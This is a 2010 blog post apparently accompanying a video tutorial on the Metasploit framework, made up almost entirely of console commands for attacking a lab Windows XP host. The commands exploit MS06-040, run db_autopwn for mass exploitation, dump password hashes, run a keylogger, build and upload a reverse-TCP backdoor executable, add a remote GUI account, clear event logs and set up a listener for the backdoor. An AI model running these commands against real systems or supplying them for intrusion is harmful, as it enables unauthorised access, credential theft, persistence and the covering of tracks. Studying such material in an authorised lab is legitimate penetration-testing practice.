Monday, June 7, 2010

[Video] Messing with Metasploit

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3308154
Download video: http://www.mediafire.com/?ztqzyl3j1mz
Commands: http://pastebin.com/9kygLiRe


What is this?
A basic guide to show how powerful the metasploit framework is!
>Setup & run a exploit.
>Use nmap to scan.
>Use db_autopwn (to exploit the masses!)
>Gather information about the target
>Read, download and upload files
>Run scripts
>Create & use a backdoor.


What do I need?
> Metasploit Framework
> (Vulnerable) target (e.g. Windows XP SP0/1)


Software
Name: Metasploit
Version: 3.3.3
Home Page: http://www.metasploit.com/
Download Link: http://www.metasploit.com/framework/download/


Commands:
cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts

#show                             ##Show everything! [wasn't in video]

use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable

#set paypload windows/shell_bind_tcp         ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit

db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts

db_autopwn -t -p -e

sessions -l
sessoins -i 1

sysinfo
#ipconfig   ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv  ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute                  ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper    ##Gets information about target, dumps reg etc[wasn't in video]
#run vnc        ##Setups VNC [wasn't in video]
#run uploadexec ##Upload and run a program [wasn't in video]
clearev
exit -y
exit -y

##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit

## Somehow run: C:\g0tmi1k\g0tmi1k.exe


Notes:
Made a few slip-ups in the video and something went wrong with keylogrecorder.
This is only the basic stuff - it can do ALOT more! See commands for a few more basic things which I didnt do.
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)